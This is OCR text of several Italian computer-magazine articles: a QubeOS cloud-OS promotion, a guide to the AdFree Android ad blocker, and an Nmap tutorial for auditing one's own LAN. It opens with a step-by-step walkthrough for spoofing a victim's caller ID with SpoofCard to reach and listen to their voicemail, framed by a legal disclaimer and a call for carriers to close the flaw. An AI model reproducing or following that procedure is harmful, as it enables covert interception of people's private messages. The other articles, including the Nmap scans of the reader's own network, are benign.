bile, ad eccezione della Vodafone. 

Vietato dalla legge! 

Ovviamente la procedura riportata, 
qualora venisse messa in pratica 
per ascoltare le conversazioni senza 
le dovute autorizzazioni, verrebbe 
considerata a tutti gli effetti come 
violazione della privacy. L'articolo 
non vuole in nessun modo incitare 
allo svolgimento delle operazioji i 
qui descritte ma ha come finalità 
lo studio per analisi personale e 
privata. 
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Scelta dei crediti da acquistare 

a Dalla Home il pirata si sposta su Sign Up , posto 
nella parte destra del portale, e seleziona il 
pacchetto di credito preferito. Nonostante la 
scelta consigliata sia la sottoscrizione mensile da 24.95$, 
'quest’ultima non viene scelta, poiché il pagamento una 
tantum non è disponibile per le telefonate in Italia. 



Un modulo da compilare 

yi Dopo aver selezionato i crediti desiderati, il 
wl malintenzionato dovrà compilare un breve 
Kv modulo con i dati anagrafici e quelli necessa¬ 
ri per effettuare l’acquisto del pacchetto. Al termine, 
per completare l’operazione, cliccherà il bottone Pur- 
chase Credits. 



Il carrello della spesa 

B Terminato il pagamento, al pirata non resta 
che controllare la propria casella di posta. Qui 
troverà un codice a 9 cifre che gli permetterà 
di accedere al proprio account. Copia (Ctrl+Q il codi¬ 
ce negli appunti del computer, dopo averlo selezionato, 
in modo da effettuare il login al servizio di Spoofcard. 
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Pronto per effettuare il Loqin 

Il pirata accede nuovamente al portale Spo- 
ofCard.com ed effettua l’accesso tramite il 
bottone Login posto in alto a destra. Inserirà 
il proprio codice a 9 cifre (Ctrl+V} e selezionerà l’im¬ 
magine in base alla richiesta effettuata. Si tratta di un 
sistema di sicurezza atto a garantire l’autenticità 
dell’utente e a bloccare eventuali bot. 


Tutto pronto per la chiamata 

B ll pirata è pronto per configurare la “telefona¬ 
ta spia”. Come prima cosa inserirà il prefisso 
internazionale (+39 per l’Italia) dall’apposito 
menu a tendina. Successivamente provvederà a impo¬ 
stare, sia per il form Destionation Number che per 
Caller ID to display , il numero di telefono del malcapi¬ 
tato. Al termine preme sul bottone Place your cali. 


Pronti per l’ascolto 

a Configurato il sistema, il pirata provvederà a 
chiamare il numero mostrato sul portale Spo- 
ofCard dopo aver premuto Place your cali. Al 
telefono risponderà un messaggio; al termine il pirata 
premerà il tasto 3. Una nuova voce chiederà di inserire 
il numero a 4 cifre apparso sullo schermo. Fatto ciò, il 
telefono della “vittima”inizierà a squillare. 
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Segreteria 

chiamo... 

1 

2 

3 


ABC •• 

OEF 

4 

5 

6 

xj OHI 

JKL 

MNO 

7 

8 

9 

POR? 

TÙV 

WXYZ 

* 

0 



Fine Nascondi tasti 


Attivazione 
della segreteria 

Sul display del cellula¬ 
re della vittima appari¬ 
rà il suo stesso nume¬ 
ro di telefono. Se la persona in 
questione risponderà alla chia¬ 
mata, allora la tecnica di “ascol¬ 
to” sarà fallita; nel caso in cui 
il destinatario dello scherzo 
abbia il telefono spento o deci¬ 
da di non rispondere, scatterà 
la segreteria telefonica. In que¬ 
sta situazione, però, invece di 
consentire la registrazione di 
un messaggio vocale, consen¬ 
tirà al pirata di ascoltare i mes¬ 
saggi del numero in questione 
registrati. 




COME FANNO I PIRATI A 
"SPULCIARE" TRA LE SEGRETERIE 


Abbiamo visto come è facile spiare i contenuti 
delle segreterie altrui mettendo in pratica 
la tecnica dell'ID spoofing telefonico. Ma i 
sistemi di protezione come mai non funzio¬ 
nano? Purtroppo l'attivazione della segreteria 
telefonica avviene attraverso l'identificazione 
del chiamante, in particolare attraverso il suo 
ID telefonico. Quindi, se qualcuno riuscisse a 
utilizzare lo stesso numero di telefono della 
persona a cui sta telefonando, avrebbe vita 
facile a “bucare" il sistema informatico del « 
gestore telefonico accedendo liberamente n 
a tutti i messaggi vocali. A questo punto ci 
auguriamo che i vari operatori telefonici de¬ 
cidano di correre subito ai ripari per tutelare 
al meglio la nostra privacy. 
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Ecco l’OS cloud di Win Magazine 
che ti regala un desktop e 5 GB 
di spazio Web sicuro 


Cosa ci » —i 
occorre 

SISTEMA OPERATIVO 
CLOUD 

QUBEOS 

Sito Internet: 

www.qube-os.com 



TANTI AMICI, 
TANTO SPAZfo 

Registrandosi a QubeOS 
usando il codice promo¬ 
zionale offerto a tutti i 
lettori di Win Magazine 
è possibile attivare uno 
spazio on-line sicuro da 
5 GB su cui archiviare 
tutti i nostri file. Se 
abbiamo comunque 
esigenze di uno Storage 
maggiore, non dovremo 
fare altro che invitarci 
nostri amici a parteci¬ 
pare alla community di 
QubeOS: per ognuno di 
loro che accetta, infatti, 
guadagneremo altri 150 
MB di spazio Web com¬ 
pletamente gratuito! 


L a moda del momento, in ambito informa¬ 
tico, è il cloud computing, una tecnologia 
che permette l'utilizzo di tutte quel le risorse 
virtuali che è possibile usare direttamente dal 
browser. Inizialmente si trattava di servizi chesi 
limitavano allo Storage on-line, ovvero hard disk 
remoti su cui si potevano salvare i file per condi¬ 
viderli e accederti da qualsiasi posto mediante 
una semplice connessione a Internet. Oggi, gra¬ 
zie alla "nuvola", si possono usare applicazioni 
anche complesse senza installare nu Ila sul PC. 
Tra i tanti servizi cloud meritevoli di attenzione 
c’è QubeOS, un vero sistema operativo con tan¬ 
to di Web Store, chat e uno spazio di ben 5 GB 
(un’esclusiva, quest’ultima, riservata ai lettori 
di Win Magazine) su cui archiviare ogni genere 
di file. In parole semplici, il sistema operativo, 
i programmi e i file non risiedono fisicamente 
sul computer dell'utente, ma si trovano su un 
server remoto cui si accede con un normale 
browser, che di fatto si trasforma nel nostro PC 
virtuale con cui accedere ai file e utilizzare i 
vari programmi. 

A prova di impiccioni 

Preoccupati che la gestione da remoto del siste¬ 
ma operativo possa mettere a rischio la sicurezza 
dei nostri dati personali? QubeOS ha pensato 
anche a questo perché il sistema operativo non 
lascia alcuna traccia sul PC utilizzato. Quando 
una sessione viene terminata, ogni dato viene 
cancellato e sul computer "fisico” non rimane 
nulla. Inoltre, il browser integrato in QubeOS 
(Navigator) e che utilizzeremo per navigare i 
siti Web (non quello utilizzato per accedere al 
sistema operativo virtuale quindi) è in grado 
di superare firewall e proxy e non lascia alcuna 
traccia di navigazione. Il nostro indirizzo IP 
viene nascosto e potremo navigare in completo 
anonimato. Incuriositi dal nuovo sistema ope¬ 
rativo virtuale? Non resta che voltare pagina per 
scoprire tutte le meraviglie di QubeOS! 
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3 Iniziamo con la registrazione 

Creiamo un account su QubeOS per usare il sistema operativo cloud senza limiti. Grazie al codice promozionale 
(valido fino al 31/01/2013), inoltre, i lettori di Win Magazine avranno a disposizione 5 GB di spazio anziché 3! 



^ La registrazione è gratuita 

■j 1 Colleghiamoci all'Indirizzo www.winmaga- 
zine.it/link/1117 e cucchiamo sul pulsante 
Registrati ora al centro della pagina. QubeOS è un 
sistema operativo virtuale gratuito dotato di un’in¬ 
terfaccia in italiano, cosa che ci permetterà di uti¬ 
lizzarlo senza alcun problema. 


▲ Facciamo le presentazioni 

2 I La finestra successiva mostrerà alcu- 
w ni campi da compilare. Digitiamo nome e 
cognome, scegliamo un nome utente, una Pas¬ 
sword e inseriamo un indirizzo e-mail valido. Digi¬ 
tiamo infine il codice promozionale WINMAG22CZ4 
per avere i 5GB di spazio e clicchiamo Registrati. 


* Un account da attivare 

2 | Riceveremo in breve tempo un messaggio 
\mcJ di posta elettronica con il link per attivare 
il nostro account. Cuccandoci sopra, si aprirà una 
finestra del browser con un messaggio di confer¬ 
ma. Torniamo all’home page di QubeOS ed effet¬ 
tuiamo l’accesso al nostro account. 


SISTEMA OPERATIVO VIRTUALE, APPLICAZIONI REALI 

Subito dopo l'installazione, QubeOS offre già tutti gli strumenti per essere subito operativi. Eccoli in dettaglio. 



WEBAPP STORE 

Accessibile dal menu Start, questo 
piccolo negozio on-line permette di 
aggiungere ulteriori applicazioni e 


Basta selezionare la categoria, cliccare 
sull'applicazione desiderata e terminare 
premendo Installa. Una finestra ci chie 
derà di confermare con OK. 


POSTA ELETTRONICA 

Per gestire le caselle di posta elettro¬ 
nica andiamo in Start/Uffìcio/eMail 
La prima volta che avviamo il Client 
di posta, dovremo configurarlo con i 
dati del nostro account fornito in fase 

p-rnr-rr- 



di registrazione. Dopo averli inseriti, 
premiamo Conferma e Invia i Dati 
per accedere alla casella di posta. 


INVITIAMO GLI AMICI 

Da Start/Accessori/Invita amici possia¬ 
mo inviare un'e-mail ai nostri amici per 
invitarli a iscriversi a QubeOS. Per ogni 
amico che accetta l'invito esi registra in¬ 
dicando la nostra e-mail, riceveremo un 
ulteriore spazio gratuito di 150 MB. 



WIDGET DESKTOP 


Dal menu Start/Multimedia/Widgets 

possiamo scegliere alcuni widget da 
aggiungere al desktop.Tra quelli dispo- 



A stTipte anatogc dock A tefàe dgftal dock 


I_,.T—I_SHB_ 

nibili ci sono la calcolatrice, l'orologio 
(sia analogico sia digitale) e FineTunes 
Player, un player multimediale. 


BROWSER WEB 

QubeOS ci mette a disposizione anche 
un browser la cui particolarità principale 
è quella di consentirci di navigare sul 
Web in anonimato celando il nostro 
indirizzo IP. Possiamocosì navigare sui 
vari siti Internet senza lasciare tracce. 



MULTIMEDIA 


QubeOS ci permette di visualizzare i fi 
le multimediali dal browser. Basta fare 
doppio clic peraprire il file nell'applica¬ 



zione associata o eseguire l'operazione 
manualmente avviando il programma 
dal menu Start/Multimedia ► 
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IL FILE SHARING 
E PRIVATO 

QubeOS permette anche 
di scambiare file con gli 
amici in maniera sicura 
e protetta. Andiamo 
in Start/Explore e spo¬ 
stiamoci in Documenti. 
Clicchiamo col tasto 
destro del mouse in una 
zona vuota e selezio¬ 
niamo Nuova cartella. 
Chiamiamo ad esempio 
la nostra cartella col 
nome dell'amico con cui 
•vogliamo condividerla. 
Al suo interno copiamo 
itile da condividere o 
carichiamoli dal nostro 
PC. Clicchiamo col tasto 
destro sulla cartella e 
selezioniamo Condividi 
con. In Aggiungi amico 
selezioniamo l'utente 
con cui vogliamo con¬ 
dividerla. In Autorizza¬ 
zione impostiamo solo 
lettura o Lettura e 
scrittura per impostare 
i permessi di accesso. 
Clicchiamo Aggiungi 
e attendiamo che si 
aggiorni la lista degli 
amici che condividono 
la cartella. Quindi 
clicchiamo Chiudi. La 
cartella condivisa sarà 
visibile nella sezione 
Shorts dell'Explore dei 
nostri amici. 

SULLA NUVOLA 
COL TELEFONINO 

Possiamo accedere 
all'account QubeOS 
anche con lo smart¬ 
phone. Se abbiamo un 
dispositivo Android, 
scarichiamo dal Market 
e installiamo l'app 
WebDAV File manager. 
Avviamola e in Menu/ 
Server Add compiliamo 
il campo URL con www. 
qube-os.com/cdrive/. 

Se abbiamo un iPhone, 
scarichiamo l'app 
WebDAV Navigator, av¬ 
viamola e compiliamo 
il campo Server URL con 
l'indirizzo visto prima. 


Personalizziamo il nostro sistema operativo virtuale per renderlo più vicino alle nostre esigenze: 
in pochi clic avremo un profilo, sceglieremo un tema e modificheremo lo sfondo del desktop. 



* Di profilo vengo meglio 

■J Andiamo in Start/Profilo Personale per aprire la finestra 
che consente di completare i dati del nostro profilo. Pas¬ 
siamo il puntatore del mouse suH’immagine a sinistra e selezio¬ 
niamo Cambia immagine , La scheda Su di me permette poi di 
completare il profilo con data di nascita e città. 


Le nostre attività 

2 | Spostiamoci nella scheda Interessi e Preferenze e 
aggiungiamo alcune informazioni personali circa i nostri 
interessi, le attività che svolgiamo, il nostro orientamento ses¬ 
suale e il credo religioso. Potranno esserci utili per trovare nuovi 
amici che abbiano i nostri stessi interessi. 



a . Le ultime impostazioni 

2 I Nel tab Impostazioni scegliamo quali informazioni rende- 
re pubbliche alla community di QubeOS. Da qui possia¬ 
mo anche cambiare la password per il nostro account per una 
maggiore sicurezza. Al termine ricordiamoci di salvare tutte le 
modifiche cliccando sul pulsante Salva Impostazioni. 


* È tutto sotto controllo 

4 i Accediamo al Pannello di controllo dal menu Start. Clic- 
-fmmJ chiamo Shortcutse scegliamo le applicazioni da aggiun¬ 
gere al desktop. Con Auto Run selezioniamo quelle da avviare 
automaticamente ad ogni accesso a QubeOS e con Avvio Veloce 
scegliamo quelle da visualizzare nella taskbar. 




^ Un aspetto su misura 

| Spostiamoci in Temi e Colori e cambiamo il tema pre- 
definito, impostando il livello di trasparenza della task¬ 
bar, Da Sfondi del Desktop, invece, modifichiamo l’immagine 
del desktop, cambiamo il colore di sfondo e anche il colore per 
il testo. Per applicare le modifiche clicchiamo Save. 


^ Conosciamo nuovi amici 

0 | Cliccando Start/Amici possiamo cercare nuovi amici nel- 
la community di QubeOS. Trovato l’utente che ci interes¬ 
sa, clicchiamo Chiedi Amicizia . Se la persona contattata accetta 
la nostra richiesta potremo avviare una sessione di chat cliccan¬ 
do sull’icona in basso a destra della taskbar. 
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9 i nostri file sono al sicuro 


Grazie a QubeOS i documenti che prima ci portavamo dietro su una pendrive possono essere salvati e gestiti 
via Web: una soluzione pratica, ma anche sicura per tenere i dati al riparo da occhi indiscreti! 



i. Tutto inizia da qui 

Con QubeOS possiamo lavorare sul desktop 
o usare l’esplora risorse per organizzare i 
file. In questo caso useremo lo strumento Explore 
che avviamo dal menu Start. Sulla sinistra visua¬ 
lizziamo le risorse presenti nel Cloud Drive, mentre 
la finestra centrale ci mostra il contenuto. 


^ Tante nuove cartelle 

2 | La prima volta che accediamo al Cloud Dri- 
s-mf ve troveremo le cartelle: Cestino. Desktop 
e Documenti. Per crearne una nuova selezioniamo 
dove metterla. Posizioniamoci in una zona libera, cic¬ 
chiamo col destro del mouse e selezioniamo Nuova 
cartella. Diamole un nome e clicchiamo OK. 



a] Mettiamo un po’ di ordine 

Possiamo creare altre cartelle e sottocartel¬ 
le, magari una per ogni tipologia di file che 
vogliamo salvare al suo interno. Dopo averla crea¬ 
ta, potremo rinominarla, cancellarla o copiarla sele¬ 
zionandola col tasto destro del mouse e cliccando 
Properties nel menu contestuale che appare. 



± Carichiamo i file... 

^ | Per archiviare i nostri file clicchiamo nella 
W»# cartella di destinazione, in uno spazio vuo¬ 
to, col tasto destro del mouse e selezioniamo Uplo- 
ad files dal menu contestuale. Premiamo Aggiungi, 
selezioniamo il file e clicchiamo Apri. Il file verrà 
aggiunto alla lista di quelli da caricare. 


a) ...emettiamoli al sicuro 

? Quando la lista è completa, premiamo Uplo- 
ad per iniziare il caricamento dei file sui ser¬ 
ver cloud. Al termine visualizzeremo un messaggio 
di conferma e potremo passare alle altre cartelle. 
Con Views modifichiamo la modalità di visualizza¬ 
zione dei file all’interno dell’esplora risorse. 


am Dal Web all’hard d isk 

Se vogliamo visualizzare un file in QubeOS 
basta un doppio clic su di esso: il sistema 
cloud avvierà l’applicazione associata al formato 
prescelto. Se invece vogliamo aprirlo sul PC in loca¬ 
le, dobbiamo prima scaricarlo: selezioniamolo col 
tasto destro del mouse e clicchiamo Download. 




ANCHE GLI ALLEGATI DI POSTA 
ELETTRONICA SONO BLINDATI 


Se abbiamo il timore che i nostri allegati di posta elettronica inviati 
con il dient integrato in QubeOS possano essere letti da persone 
non autorizzate, l'applicazione Cryptmodule scaricabile dal WebApp 
Store (accessibile dal menu Start/WebApp Store) è quella che fa per 
noi. Ci permette, infatti, di criptare e decriptare un file o una cartella 
proteggerlo con una password. Dopo averlo criptato, possiamo 
inviarlo in tutta sicurezza perché chi lo riceve potrà aprirlo solo se 
conosce la password. E, ovviamente, cerchiamo di ricordarla bene 
anche noi, altrimenti il rischio è quello di non riuscire più ad accedere 
ai nostri documenti. 
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Banner seccanti? No grazie I 


Non ne puoi più dei fastidiosi messaggi pubblicitari 

presenti nelle app gratuite? AdFree è la soluzione! 


Banner seccanti? 
No, grazie! 


U no dei principali vantaggi del 
mondo Android è quello di 
poter installare migliaia di 
applicazioni senza togliere di tasca 
un solo centesimo. Al contrario del 
rivale iPhone, sul Play Store le app 
a pagamento non sembrano infatti 
essere molto gettonate e dunque, 


per gli sviluppatori, non rimane 
altra soluzione se non quella di ri¬ 
lasciare materiale gratuito, ma con¬ 
dito da banner pubblicitari per tutti 
i gusti. È anche vero però che tante 
volte i posti nel quale quell'odioso 
banner finisce non sono poi così 
felici e, se il nostro display è anche 


piccolo, usare l'applicazione diviene 
una vera e propria sfida! A risolvere 
tale inconveniente ci pensa AdFree, 
l'applicazione che in un solo tap 
blocca ogni banner pubblicitario 
presente in tutte le app installate 
sul nostro telefonino. Installiamola 
subito! 



Facciamo un salto sul Plav Stare 

Dopo aver connesso a Internet il nostro telefonino, acce¬ 
diamo al Play Store e ricerchiamo l'app gratuita AdFree 
Android. Tappiamo dapprima sul pulsante Scarica e suc¬ 
cessivamente confermiamo con Accetta e scarica. Non ci resta che 
attendere la fine del download e l'installazione dell'app. 


Q Boot Normally? 


Boot Normally or Show 
TCPdump Screen? 



La gi usta modalità d’avvio 

Al termine, ricerchiamo nel menu principale dei nostro tele¬ 
fonino il software appena installato e avviamolo. Ci viene 
chiesto di scegliere la modalità di avvio di AdFree. Show 
TCPdump Screen è utile solo dopo aver configurato l'applicazione. 
Scegliamo quindi Boot Normally e attendiamo qualche secondo. 




La seguente applicazione richede accesso 
Superuser: 

Applicazione AdFree (10066) 
Pacchetto corri.bigtin...roid.adfree 
U1D richiesto root (0) 

Comando /system/btn/sh 



Scarica & Installa Hosts 


Ripristina 


Controlla aggiornamenti 
quotidianamente. 

| Applica aggiornamenti 
automaticamente 


Usa il link simbolico a /data/data/hosts 


Permessi amministrativi necessari 

Affinché AdFree svolga correttamente il suo lavoro è neces¬ 
sario che sul nostro smartphone Android siano attivi i per¬ 
messi di amministrazione (in gergo tecnico, root). Tappiamo 
sul pulsante Consenti per assegnare tali permessi anche all’app e 
attendiamo ancora qualche secondo: AdFree incomincia la scansione 
delle app installate. 


il 


Tutto pronto e perfettamente configurato! 


H AdFree fa tutto da solo: dopo aver terminato la scan¬ 
sione e aver rilevato tutte le app nelle quali è presente 
pubblicità, provvede a eliminarla. Per far si che AdFree 
sia sempre funzionante, attiviamo le opzioni Controlla aggior¬ 
namenti quotidianamente e Applica aggiornamenti automa¬ 
ticamente. 


Cosa ci 
occorre 

APP ANDROID PER IL 
BLOCCO DEI BANNER 
PUBBLICITARI 

ADFREE ANDROID 

Sito Internet: https:// 
play.google.com 



LA BATTERIA 
DURA DI PIU 

Ad alcuni sembrerà 
strano ma è tutto vero: 
la presenza di banner 
pubblicitari all'interno 
delle app Android incre¬ 
menta notevolmente il 
consumo della batteria. 
Utilizzando AdFree, 
dunque, l'autonomia 
del nostro smartphone 
aumenterà. Di certo 
non aspettiamoci un 
guadagno estrema 
mente sensibile, ma 
basterà qualche giorno 
per averne una prova 
tangibile. Provare per 
credere! 

NON SEMPRE 
FUNZIONA! 

Alcune applicazioni 
gratuite nelle quali è 
presente della pubblici¬ 
tà seguono la logica "No 
banner, no party". In 
poche parole, all'avvio 
effettuano un controllo' 
per verificare la pre¬ 
senza di software come 
AdFree. Se la pubblicità 
non può essere visua¬ 
lizzata, non è possibile 
utilizzare l'applicazio¬ 
ne. In tal caso non ci 
resta che disabilitare 
momentaneamente 
AdFree tappando sul 
pulsante Ripristina pre¬ 
sente nell'Interfaccia 
grafica principale del 
software. 
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e tecnologia 
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in Italia. 
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utilizzo creativo del computer 
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Testiamo la rete evidenziandone 
tutte le vulnerabilità, prima che 
siano sfruttate dai pirati. Si fa così 


S ebbene i canonici strumenti di difesa dagli 
attacchi informatici t ipicamente utilizzati 
sui nostri computer o nelle reti locali (in 
primis, i firewall) offrano in molti casi una ade¬ 
guata protezione verso le insidie provenienti 
dall’esterno. È doveroso evidenziare che, in 
talune circostanze, l’utilizzo di questi strumenti 
potrebbe rivelarsi inefficace nel segnalare alcu¬ 
ni tipi di minacce potenzialmente pericolose, 
delle vulnerabilità che se non tempestivamente 
sanate potrebbero consentire a un attaccante 
remoto di compiere un certo numero di opera¬ 
zioni illegittime sui nostri sistemi. 

A caccia di vulnerabilità 

Tale problema potrebbe concretizzarsi sia a 
causa di un errore intrinseco al sistema di pro¬ 
tezione impiegato, sia in seguito a un’altera¬ 
zione di quest'ultimo dovuta all'involontaria 
esecuzione di un software in grado di veicolare 
agenti malevoli come, per esempio, un virus, 
un trojan o una backdoor. Per queste ragioni, 
è opportuno integrare i normali software di 
protezione (firewall, antivirus ecc.) con dei pe¬ 
riodici controlli della macchina/rete, controlli 
effettuati secondo un differente approccio del 
tutto immune al tipo di compromissione appena 
citata. Il panorama informatico odierno, a tal 
proposito, offre una vasta gamma di strumenti 
pensati per compiere questo tipo di attività, 
un’operazione che in letteratura informatica 
prende il nome di network exploration o au¬ 
diting. Si tratta di strumenti software in grado 
di analizzare da remoto, in modo rapido ed 
efficace, sia una singola macchina, sia un’intera 
rete informatica, anche di grandi dimensioni. 
Lo scopo di tale operazione è quello di fornire 
quante più informazioni possibili sull’obiet¬ 
tivo desiderato, informazioni che possiedono 
una doppia valenza, in quanto estremamente 
preziose sia agli utenti/amministratori per ve¬ 
rificare la sicurezza della propria macchina/ 


Cosa cl 
occorre 

TOOL DIAGNOSTICA 
DIRETE 

NMAP 

Lo trovi su: 9?CD 

Sito Internet: 

http://nmap.org 


ASCOLTIAMO 
GLI ESPERTI 

Quando le porte aperte 
non riconducono a una 
frettolosa o cattiva con 
figurazione del sistema 
da parte dell'utente, 
ma sono invece il frutto 
dell’azione di un qualche 
tipo di malware (virus, 
trojan ecc.), l'operazione 
di messa in sicurezza po¬ 
trebbe rivelarsi più com¬ 
plessa e richiedere, in 
taluni casi, perfino una 
completa reinstallazione 
del sistema operativo. 

In tale frangente, consi¬ 
derando la molteplicità 
dei possibili scenari, 
l'approccio consigliato è 
quello di ricercare infor¬ 
mazioni di "prima mano" 
su Internet purché, ov¬ 
viamente, le fonti siano 
affidabili (Sans, www. 
sans.org, Symantec, 
www.symantec.it, ecc.), 
altrimenti il rimedio po¬ 
trebbe rivelarsi peggiore 
del male. 


al sicuro 
■tua LAN 








□ Installiamo ciò che serve 


Le prime versioni di Nmap non disponevano di alcuna interfaccia grafica. Oggi è possibile impiegarlo sia da riga 
di comando, sia, più semplicemente, mediante il suo front-end grafico Zenmap. Ècco come attivarlo. 



Selezioniamo i componenti 

Avviamo l'installazione di Nmap eseguen¬ 
do il file nmap-5.51-setup.exe (presente 
sul M/m CD-ROM) e accettiamo le selezioni propo¬ 
ste, confermandole con la pressione del pulsante 
Next. installeremo così sia le componenti indispen¬ 
sabili, sia alcuni piccoli programmi di utilità. 


▲ f Completiamo i’instaliazione 

2 | Al termine della procedura di installazione 
w ci verrà richiesto se avviare il servizio di rete 
WinPcap e se farlo automaticamente ad ogni suc¬ 
cessivo riawio del sistema operativo: accettiamo 
tutte le impostazioni predefinite confermandole con 
un clic sul pulsante Next. 


Avviamo il programma 

Avviamo l'interfaccia grafica di Nmap con un 
doppio clic sull’icona Nmap - Zenmap GUI 
presente sul Desktop. Nonostante si possa adoperare 
anche in modalità testuale, l'interfaccia grafica con¬ 
sente un uso immediato anche a coloro che lo avvia¬ 
no per la prima volta. 



Tutto funziona bene 


Prima di impiegare effettivamente il software appena installato, effettuiamo una prima rapida verifica delle sue 
funzionalità, indicando come obiettivo delle interrogazioni la nostra macchina locale. 
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Una verifica iniziale 

■| | Per prendere confidenza con l'ambiente 
grafico di Nmap, rivolgiamo un’interroga¬ 
zione alla nostra macchina scrivendo 127.0.0.1 in 
Target si tratta dell'indirizzo IP convenzionalmen¬ 
te assegnato alla macchina locale (per saperne di 
più, leggi il box Localhost: questo sconosciuto). 


* I profili disponibili 

2 f La tipologia di interrogazioni eseguibili è ini- 
zialmente limitata ad alcuni profili di attacco 
predefiniti presenti nella casella Profile. Per effet¬ 
tuare la nostra prima interrogazione usiamo uno di 
questi profili, Intense Scan. che equivale a dare il 
comando testuale nmap -T4 -A -v 127.0.0.1. 


* Osserviamo i risultati 

3 \ Avviata l'interrogazione con il pulsante 
Scan, il riquadro destro mostrerà in tempo 
reale le informazioni ottenute sul Target indicato 
(in base al tab selezionato, Ports/Hosts, Topo- 
logy, Nmap Output ecc.), mentre quello sinistro 
consente la selezione dei target già interrogati. 


rete, sia ai malintenzionati che possono così 
sfruttare le vulnerabilità rilevate. Tra i software 
di questa categoria, quello che oggi "de facto" 
viene considerato lo standard da coloro che si 
occupano di sicurezza i nformatica (e, purtrop¬ 
po, anche per chi opera in direzione opposta) è 
certamente Nmap. 

Non aprite quella porta 

Contrazione dei termini network e mapper, 
esso è infatti da tempo divenuto il software di 


analisi per antonomasia, una sorta di coltellino 
svizzero multifunzione con il quale è possibile 
compiere un numero enorme di operazioni, 
talvolta anche molto sofisticate: inviando in 
rete dei pacchetti opportunamente forgiati, 
Nmap è in grado infatti di enumerare le risorse 
di una macchina/rete remota (elaboratori ed 
ogni dispositivo d i rete presente), fornendo per 
ciascuna di esse un certo numero di informa¬ 
zioni come, per esempio, il tipo e la versione 
del sistema operativo impiegato e i servizi in 


esecuzione. Un altro elemento che caratterizza 
fortemente Nmap, differenziandolo dagli altri 
software che svolgono funzioni analoghe, è 
sicuramente la sua abilità nel compiere tantis¬ 
sime operazioni in tempi molto brevi, anche 
quando l’obiettivo sono centinaia di migliaia 
di macchine. Proprio per queste sue peculiarità 
Nmap si è conquistato il ruolo di strumento 
d'elezione in ambito sicurezza, consentendo agli 
operatori una efficace verifica delle vulnerabilità 
all’interno di una struttura di rete (attività che ► 
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O Ti spio da PC 


I Metti al sicuro la tua rete LAN I 


B Interroghiamo la rete 

Terminata la preliminare verifica del funzionamento di Nmap, vediamo come operare l'interrogazione della LAN, 
presupponendo che essa operi nell’intervallo di indirizzi IP compreso tra 192.168.1.1 e 192.168.1.254. 
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Scegliamo l'obiettivo 

■| | Per non violare la legge, rivolgiamo le inter- 
rogazioni verso le macchine della nostra 
LAN. Scriviamo 192.168.1.0/24 in Target per indi¬ 
care tutti gli indirizzi IP compresi tra 192.168.1.1 e 
192.168.1.254. Da Profile selezioniamo Regular 
scane inseriamo l'opzione -modificando in nmap -v 
192.168.1.0/24 il contenuto della casella Command. 


^ Creiamo un nuovo profilo 

2 I II parametro -^permette di ottenere ulterio- 
w ri informazioni durante il funzionamento del 
programma. Per non riscrivere ogni volta da zero i 
comandi personalizzati, avvaliamoci della possibilità 
offerta da Nmap di creare nuovi profili. Scegliamo 
Pro file Editor dal menu Pro file e creiamo un nuovo 
profilo denominato, ad esempio, TestScan. 


^ Osserviamo i risultati 

3 1 Avviata l'interrogazione con il pulsan- 
te Scan, il riquadro destro mostrerà in 
tempo reale le informazioni ottenute sul Tar¬ 
get indicato (in base al tab selezionato, Ports/ 
Hosts, Topotogy, Nmap Output ecc.), mentre 
quello sinistro consente la selezione dei target 
già interrogati. 


prende il nome di pcnetration testi ng), prima 
che queste, magari evidenziate con lo stesso 
strumento, vengano sfruttate dai potenziali 
malintenzionati. Ribadendo il concetto che sia 
gli addetti alla sicurezza sia i malintenzionati 


hanno a disposizione i medesimi strumenti 
informatici, possiamo facilmente evincere come 
il risultato finale dipenda soltanto dai tetitpi di 
intervento: chi giunge per primo sarà certamen¬ 
te il vincitore, buono o cattivo che sia. In questo 


articolo vedremo come impiegare Nmap al fine 
di verificare la sicurezza della nostra macchina/ 
rete, in modo da poter correre immediatamente 
ai ripari, eliminando le vulnerabilità eventual¬ 
mente rilevate. 


PORTE DI COMUNICAZIONE: ECCO COME FUNZIONANO 


Quando due macchine comunicano 
tra loro in una rete, devono esprimersi 
attraverso un protocollo comune, cioè 
usare un linguaggio comprensibile ad 
entrambi. Il discorso si complica quando 
una di queste macchine offre più servi¬ 
zi (server) e l'altra desidera utilizzarne 
soltanto uno (clienti: si tratta di uno 
scenario di tipo server/dient, dove oltre 
a impiegare un protocollodi comunica¬ 
zione comune, occorre individuare un 
metodo che consenta alla macchina 
Client di selezionare il tipo di servizio 
da fruire. La famiglia di protocolli TCP/ 
IP risolve questo problema impiegando 
un valore di tipo numerico denominato 
porta: come avviene per gli indirizzi IP, 
un organo centrale operante a livel¬ 
lo mondiale (IANA: Internet Assigned 
Numbers Authority) stabilisce i criteri 
per l'assegnazione dei numeri di que¬ 
ste porte. IANA pubblica un elenco 
standard dove sono riportate le corri¬ 
spondenze tra servizi e numeri di porta, 
elenco che prevede un'assegnazione di 


tipo rigido solo per quel che concerne 
le prime 1024 porte, che prendono la 
denominazione di WelIKnown Services 
(servizi noti) o Privileged Ports (porte 
privilegiate). Questo metodo è in grado 
di risolvere efficacemente il problema, 
in quanto consente alle macchine dient 
di selezionare in modo univoco uno dei 
servizi resi disponibili da una macchi¬ 
na server: ciò avviene in modo molto 
sempl ice, facendo seguire l'indirizzo IP 
di destinazione (quello del server) dal 
numero della porta desiderata. 

UN ESEMPIO PRATICO 

In figura viene mostrato il meccani¬ 
smo appena descritto: la porta usata 
sul server è la 80, che corrisponde al 
servizio HTTP (HyperText Transfer Pro¬ 
tocol). Un server rende disponibile i 
suoi servizi e si pone in ascolto (listen) 
sulle relative porte che, normalmente, 
sono comprese tra quelle privilegiate. 
Nell'esempio, il server offre tre ser¬ 
vizi : 80 HTTP, 23 TELNET, 21 FTP. Un 


Client si connette al servizio HTTP del 
server tramite il browser), operando 
una sua porta non utilizzata da altri 
processi (di solito, una delle porte non 
privilegiate, quindi, oltre la 1024); in 
questo esempio il Client sta utilizzan¬ 
do la porta 3000. Il protocollo TCP/IP 

Server 

FTP, Telnet e HTTP 

Porta 21 (FTP) 

Server 

FTP, Telnet e HTTP 


dispone di 65535 porte delle quali, 
convenzionalmente, quelle comprese 
nell’intervallo tra la porta 1024 e la 
porta 65535 sono dedicate ai processi' 
di tipo Client mentre, invece, quelle 
comprese tra 0 e 1023 sono dedicate 
ai processi di tipo server. 


Porta 23 (Telnet) 


Porta 80 (HTTP) 


Porte in ascolto 





Porta 3000 


Porta 80 (HTTP) 
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0J Ecco le vulnerabilità 

Una volta terminata l’interrogazione delle macchine attive nella rete, dobbiamo interpretare 
opportunamente i risultati al fine di evidenziare eventuali vulnerabilità da sanare. 
